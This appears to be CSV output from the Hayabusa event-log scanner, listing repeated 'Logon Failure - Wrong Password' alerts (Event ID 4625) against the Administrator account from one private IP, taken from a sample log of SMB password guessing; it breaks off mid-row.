+2016-09-19 16:52:29.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.035 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.199 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.423 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.463 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.865 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.910 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:30.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.187 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.311 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:31.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.890 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.962 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:31.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.123 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.412 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:32.747 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
